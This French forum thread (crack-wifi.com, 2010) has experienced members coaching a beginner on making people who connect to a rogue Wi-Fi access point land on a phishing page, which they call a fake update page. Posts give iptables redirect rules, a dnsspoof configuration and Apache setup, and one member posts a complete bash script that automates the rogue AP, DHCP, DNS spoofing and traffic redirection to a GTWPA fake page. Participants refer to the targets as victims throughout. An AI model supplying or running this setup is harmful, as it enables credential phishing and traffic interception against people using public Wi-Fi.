Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 27-09-2010 09:23:23

ThenOOb
Membre Hyperactif
Inscription : 27-09-2010
Messages : 57

Fake page

Bojour,alut,hello,:D


Je suis un noob qui commence maitriser les rogue ap(enfin en open):P

J'ai bien des fake page grace a gtwpa mais vu que je suis un adepte des invite de commande je ne fais rien avec le scripts(sa m'aide a comprendre ce que je fais).
Une fois mon fake ap monté je ne vois pas comment envoyé ces pages a la victime a travers le rogue.
Le principe c'est que la victime tombe sur la fake  page quand elle arrive sur le rogue?
Ou c'est a nous de lui envoyé?

Désolé si ma question vous parait un peu ridicule:)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 27-09-2010 12:09:35

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Fake page

Salut ThenOOb, bienvenue sur le forum smile

ThenOOb a écrit :

Bojour,alut,hello,:D

L'intrus est "hello", c'est le seul qui a toutes ses lettres tongue

Bon, plus sérieusement, le "principe" est effectivement que la victime tombe sur la page piégée sans qu'on aie besoin de lui envoyer. Pour ça, on crée une règle iptables (pare-feu intégré de linux) pour dire "tout ce qui arrive sur le port TCP 80 depuis la victime doit être redirigée sur le port 80 de la machine attaquante" :

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80

Après, tu n'as plus qu'à faire tourner un serveur web (genre Apache) sur ta machine attaquante, et proposer la page piégée. Quelle que soit l'adresse que la victime tapera, elle finira toujours sur ton serveur avec ta page smile
Note qu'il y a plusieurs règles à donner pour pouvoir gérer également le DNS, le transfert de trafic,... :

...
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.0.1
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
...

C'est un excellent réflexe de ne pas se baser sur des scripts sans savoir comment ca marche, mais si tu veux comprendre ce que tu fais tu as quand même intérêt à y jeter un œil wink Dans le cas-présent, je te conseille de regarder un peu les 2-3 premières pages du sujet GTWPA, on y détaille bien chaque étape de l 'attaque, ca devrait te permettre d'y voir plus clair smile

Hors Ligne

#3 27-09-2010 14:42:14

PentestNoob
Membre
Inscription : 25-08-2010
Messages : 13

Re : Fake page

L'intrus est "hello", c'est le seul qui a toutes ses lettres tongue

plus_un

Hors Ligne

#4 28-09-2010 18:08:58

ThenOOb
Membre Hyperactif
Inscription : 27-09-2010
Messages : 57

Re : Fake page

bonjour bonjour,

Mon serveur se lance bien mais impossible d'obtenir une fake page quand le client se connecte.

Dnsspoof ou dns poison ne peut pas faire sa?Ou faut que je crée un fichier html ou php?

Hors Ligne

#5 28-09-2010 18:12:26

ThenOOb
Membre Hyperactif
Inscription : 27-09-2010
Messages : 57

Re : Fake page

J'ai tenté d'utiliser lighthttpd également en mettant le chemin de recherche de mon fichier par exemple lighthttpd -f /root/index.php et sa e marche pas non plus

Hors Ligne

#6 28-09-2010 19:20:44

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Fake page

euh http.conf en root et un fichier htdocs devrais le faire non smile

et metasploit ou ettercap pour le spoof dns

Hors Ligne

#7 28-09-2010 22:03:32

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Fake page

ThenOOb, comme je l'ai dit, tu devrais jeter un œil au sujet GTWPA et les différentes commandes que ce script comporte. Quitte à poser des questions ici si tu ne les comprends pas wink

Oui, dans la version originale, on utilise dnsspoof (ou dnspoison) pour rediriger tous les domaines vers la machine attaquante. Mais avec la règle iptables dont j'ai parlé plus haut, je *pense* (jamais vérifié) que ca devrait rediriger les requêtes vers la page piégée wink
Le problème dans ton cas (à mon avis) c'est que la victime n'a accès à aucun DNS, et donc elle ne sait charger aucune page (j'ai bon ?). Tu as plusieurs options :
- lancer un serveur DNS sur la machine attaquante (lourd à faire, cfr. dnsmasq)
- lancer un dnsspoof/dnspoison pour corrompre les requêtes DNS qui passent par l'attaquant
- spécifier directement un DNS externe via la configuration de dhcpd.conf (plus facile, même si je ne connais pas l'option exacte). Un truc de ce genre-là je pense :

option domain-name-servers 8.8.8.8;

Après, la victime aura ses réponses DNS, mais iptables la redirigera quand même vers la page piégée (si je me trompe pas). Le mieux reste quand même de faire un empoisonnement DNS derrière, pour être sûr smile

Dis-toi bien que tu t'attaques à un gros morceau, faire un Rogue AP propre et efficace demande pas mal de notions, déjà rien que pour configurer le DHCP c'est le bord*l (Carto_, si tu m'entends... roll) alors quand il faut tout mettre ensemble... big_smile

Hors Ligne

#8 28-09-2010 22:29:05

ThenOOb
Membre Hyperactif
Inscription : 27-09-2010
Messages : 57

Re : Fake page

euh oué mais faut que je mette le chemin exact de la fake page dans httpd.conf c'est sa?
après je fais quoi?

Hors Ligne

#9 28-09-2010 22:31:43

ThenOOb
Membre Hyperactif
Inscription : 27-09-2010
Messages : 57

Re : Fake page

Désolé tout et en anglais c'est pas evident pour un débutant.

Hors Ligne

#10 29-09-2010 00:14:32

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Fake page

Bon, en gros tu voudrais une solution complète pour forcer la victime à afficher une page piégée ? hmm
Histoire qu'on ne perde pas du temps avec ce qui marche, qu'est-ce que tu as comme base ?
- est-ce que ton Rogue est en place (avec airbase-ng) ?
- est-ce que le DHCP fonctionne ? (=> est-ce que la victime reçoit une IP valide)
- est-ce que la victime peut surfer sur le net en étant connecté à ton Rogue ?
- ...
Bref, donnes-nous un max de détails pour voir de quelle base on part smile

Pour le reste, j'ai pas vraiment envie de faire un copier-coller détaillé de GTWPA... Même si les commandes sont en anglais, toute la discussion est en français donc ton argument est moyen. Bon, pour ta défense c'est un peu hard à assimiler en tant que débutant, mais je t'ai prévenu : un rogue AP n'est pas un sujet facile à la portée d'un débutant wink
Voilà ce qui reste à faire :
- mettre ta page piégée dans [c]/var/www/[/c]
- lancer le serveur web apache pré-installé dans BT4 (il doit y avoir une option pour ca dans Menu > Services > HTTP)
- mettre en place un empoisonnement DNS pour rediriger les requêtes vers ta machine
- et travailler avec iptables pour rediriger le trafic comme il faut entre tes interfaces, et forcer la victime à visiter ta page piégée wink

Je suis loin d'être un spécialiste du Rogue, mais on peut essayer de t'expliquer à condition que tu nous dises sur quelle base on part et ce que tu veux exactement smile

Un dernier détail : si à un moment ca ne marche pas, donne un max de précisions sur l'erreur rencontrée (page vide, page introuvable, connexion refusée,...), pour qu'on sache à quoi on a à faire wink

Hors Ligne

#11 29-09-2010 01:30:21

ThenOOb
Membre Hyperactif
Inscription : 27-09-2010
Messages : 57

Re : Fake page

TOU marche le rogue le dhcp mais pour un rogu nn transparent j"aimerais envoyé une fak page de mise a jour mais je ne sais pas le faire:/

Hors Ligne

#12 29-09-2010 16:27:32

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Fake page

Bon. donc je vais supposer que le Rogue transparent est fonctionnel, et qu'une victime qui se connecte dessus peut visiter n'importe quelle page. Très bon point de départ ! smile

Pour le rendre "non-transparent", essaie ceci :
- créer un fichier dns.txt où tu écris juste ceci :

<adresse_ip_attaquant> *.*

(en remplaçant évidemment [c]adresse_ip_attaquant[/c] par l'adresse IP de ton interface at0)
- tu lances cette commande :

dnsspoof -i at0 -f dns.txt

- tu places ta fausse page web dans [c]/var/www[/c], en l'appelant index.html
- tu actives le serveur Web (cliques sur le menu en bas à gauche > Services > HTTPD > "Start HTTPD")
- et tu fais l'essai depuis une machine victime smile

Normalement ca devrait marcher, mais (je me répète) je ne suis pas du tout un spécialiste là-dedans, donc je ne garantis rien. Si ca foire, essaie un "ping" depuis la victime vers un site web (genre google.fr). Là tu dois avoir une réponse de ta machine attaquante (enfin, son IP), si ce n'est pas le cas c'est que l'empoisonnement DNS foire.
Il faudra peut-être (sûrement) aussi travailler avec iptables, mais là je n'y connais quasi-rien donc je ne sais pas encore t'aider, mais je vais essayer de trouver les règles qui vont bien wink

Hors Ligne

#13 29-09-2010 19:29:42

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Fake page

Héhéhéhé,

Je me suis un peu penché sur ton problème cet après-midi et j'ai réussi, aux termes de quelques tentatives, à faire fonctionner la chose.

Voici mon script, qui automatise le tout mais en le lisant tu devrais comprendre ... Je ne sais pas trop ce qui plante chez toi, apparemment le dnsspoof.


#!/bin/bash
name="SCRIPT V0.2"
version=0.1
by=Carto_

#DEBUG=ON
DEBUG=OFF

# Colored dialogs
GREEN="\033[1;32m"
RED="\033[1;31m"
END="\033[1;37m"

killall -9 dhcpd tcpdump airbase-ng dhcpd3
airmon-ng stop wlan1
airmon-ng stop wlan0
airmon-ng stop mon0
airmon-ng stop mon1
airmon-ng stop mon2
airmon-ng stop mon3
airmon-ng stop mon4
airmon-ng stop mon5
airmon-ng stop mon6

echo 1 > /proc/sys/net/ipv4/ip_forward;
cat /proc/sys/net/ipv4/ip_forward;
echo
echo

echo ">>> Interface Internet ? ";
read IFACE;
echo

echo ">>> Interface Rogue ? ";
read WIFACE
echo

airmon-ng start $WIFACE;
modprobe tun;
echo
echo
echo ">>> Nom de la Rogue_AP ? "
read NAME_AP
echo
echo
echo ">>> Channel de la Rogue_AP ?"
read CHANNEL

xterm -hold -e airbase-ng -P -C 30 -c $CHANNEL -e $NAME_AP -v mon0 &>/dev/null &
sleep 2

echo ">>> SCRIPT EN COURS D'ÉXÉCUTION <<<"
modprobe tun ;
ifconfig at0 up ;
ifconfig at0 192.168.1.129 netmask 255.255.255.128 ;
ifconfig at0 mtu 1400 ;
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129 ;

cat >/etc/default/dhcp3-server <<EOF
INTERFACES="at0"
EOF

service apache2 start;



mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
echo > '/var/lib/dhcp3/dhcpd.leases'
xterm -hold -e dhcpd3 -d -f -cf /root/Rogue/conf/dhcpd/dhcpd_marine.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &

sleep 2

iptables --flush ;
iptables --table nat --flush ;
iptables --delete-chain ;
iptables --table nat --delete-chain ;
iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE ;
iptables --append FORWARD --in-interface at0 -j ACCEPT ;
iptables -t nat -A PREROUTING -p udp -j DNAT --to 208.67.222.222;
echo
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to 208.67.222.222;
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.1.129:80



cat >RogueAP/dns.txt <<EOF
192.168.1.129 *
EOF


xterm -hold -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &
sleep 2

Et mon DHCPD.CONF (change le chemin dans le script d'ailleurs, le miens un peu étrange j'en conviens)

 ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.128 netmask 255.255.255.128 {
server-name "hotspot.neuf.fr";
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.1.255;
option routers 192.168.1.129;
option domain-name-servers 208.67.222.222;
range 192.168.1.130 192.168.1.140;
}

Pour résumer donc :

- Lancement d'une Rogue AP transparente normale
- Iptables configuré pour tout renvoyer sur mon port 80 (celle de la machine attaquante)
- apache2 (BT4) configuré
- dnsspoof pour assurer le tout

Le tour est joué _


J'OUBLIAIS : dans /var/www/ j'ai décompressé une des archives utilisées par GTWPA, une Fake Page, tout simplement et puis voila.

Dis moi ce qu'il ressort de tout ça smile


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#14 02-10-2010 20:46:58

ThenOOb
Membre Hyperactif
Inscription : 27-09-2010
Messages : 57

Re : Fake page

BONSOIR je viens d'essayer mais mon serveur apache refuse de démarrer on diré, je reste bloquer la et rien ne se passe après.

Hors Ligne

#15 02-10-2010 21:42:00

ThenOOb
Membre Hyperactif
Inscription : 27-09-2010
Messages : 57

Re : Fake page

J'ai des choses a confihurer avec apache?

Hors Ligne

#16 03-10-2010 00:18:50

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Fake page

ThenOOb, j'te l'ai déjà dit : on a besoin de détails et de précision sur les erreurs que tu rencontres, sinon on ne sait rien faire (on est pas devins) smile
Donc :
- donne la commande/procédure exacte que tu appliques pour lancer Apache
- donne-nous aussi exactement le message d'erreur que tu rencontres, ou bien les symptômes qui te font penser que ça "refuse de démarrer"

A priori, tu n'as rien à configurer à partir du moment où tu mets ta page index.html dans [c]/var/www[/c] et que tu lances le serveur HTTP via le menu "Services" wink

Hors Ligne

#17 03-10-2010 19:22:51

ThenOOb
Membre Hyperactif
Inscription : 27-09-2010
Messages : 57

Re : Fake page

Salut et merci de m'aider commum:P

Alors sous backtrack il ne se passe rien après cette commande:

service apache2 start;

j'ai essayer avec mon unbutu aussi et me met unkown command j'ai téléchargé rapache pour tester avce voir si sa marchai et quand je fais start server il ne se passe rien non plus.

Que se soit backtrack ou unbutu je suis bloqué o meme endroit.

pour unbutu c'est la9.10 et bt4

Hors Ligne

#18 05-10-2010 00:56:50

ThenOOb
Membre Hyperactif
Inscription : 27-09-2010
Messages : 57

Re : Fake page

BNsoir j'ai retenté ma rogue AP tout marche mais qd je fais

dnsspoof -i wlan1 -f var/www/index.html

J'ai cette erreur

ioctl couldn't resolve adress Ip

ou un truc dans le genre mais en gros sa dis que c'est impossible d'attribuer une IP alors que l'otre pc peut naviguer sur internet et a une IP je comprend pas vraiment pk sa me dit sa
et après sa s'arrete la.

Hors Ligne

#19 05-10-2010 14:27:56

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Fake page

Tu utilises mal dnsspoof wink l'option -f ne pointe pas vers la fausse page où tu veux rediriger le trafic, mais sur un fichier de configuration qui servira à modifier les requêtes DNS. Ce fichier (par exemple dns.txt) doit avoir la structure suivante :

<adresse_ip_attaquant> *.*

(comme je te l'ai indiqué 6 messages plus haut wink)

Hors Ligne

#20 05-10-2010 15:47:35

ThenOOb
Membre Hyperactif
Inscription : 27-09-2010
Messages : 57

Re : Fake page

Donc je crée un fichiers dns.txt
je met mon ip <10.0.0.1>*.*      et c'est bon?

le fichier dns.txt je le met dans le root avec  le script?

merci pour ton aide en tout cas

Hors Ligne

#21 05-10-2010 19:07:15

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : Fake page

10.0.0.1 *.*

Comme çà wink


Sharkoff

Hors Ligne

#22 07-10-2010 01:37:30

ThenOOb
Membre Hyperactif
Inscription : 27-09-2010
Messages : 57

Re : Fake page

Bonjour tout marche bien sur le rogue mais quand je lance dnsspoof sa marche plus mon 2e ordi ne peut plus naviguer du tout et me met page web inacessible...
(j'ai pourtant mis l'ip de mon ordi qui a la rogue dans dns.txt)

Hors Ligne

#23 07-10-2010 12:22:33

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Fake page

Tu as bien activé le serveur Web sur ta machine attaquante ? Tu as mis ta fake page dans le dossier /var/www ? Ca donne quoi quand tu tapes directement l'adresse IP de ta machine attaquante dans le navigateur de la victime ?

Normalement ca devrait afficher la fausse page. Si ce n'est pas le cas, c'est qu'il y a un problème avec le serveur Web, et ca ne sert à rien de t'occuper de la partie DNS tant que ton serveur web ne fonctionne pas correctement smile

Hors Ligne

#24 07-10-2010 12:46:55

ThenOOb
Membre Hyperactif
Inscription : 27-09-2010
Messages : 57

Re : Fake page

Salut,tu entend quoi par activer le serveur web? quand ma rogue et lancé il faut activer autre chose?

Forcement sa risquait pas de marcher:lol:

Hors Ligne

#25 07-10-2010 12:53:06

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Fake page

Serveur Web = Apache, on en a déjà parlé 5 fois sur ce sujet roll

antares145 a écrit :

- tu places ta fausse page web dans /var/www, en l'appelant index.html
- tu actives le serveur Web (cliques sur le menu en bas à gauche > Services > HTTPD > "Start HTTPD")
- et tu fais l'essai depuis une machine victime smile

S'il faut répéter les étapes de base tous les 5 posts ca va devenir compliqué tongue

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
8 3887 15-06-2016 04:48:18 par Teeknofil
AIDE : AWUS036H Fake? par Jilhali
16 1209 09-06-2015 20:32:48 par M1ck3y
2 759 16-08-2014 11:06:04 par johny12
4 3144 20-06-2014 16:28:41 par M1ck3y
1 1005 06-04-2014 11:40:27 par M1ck3y

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.031 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]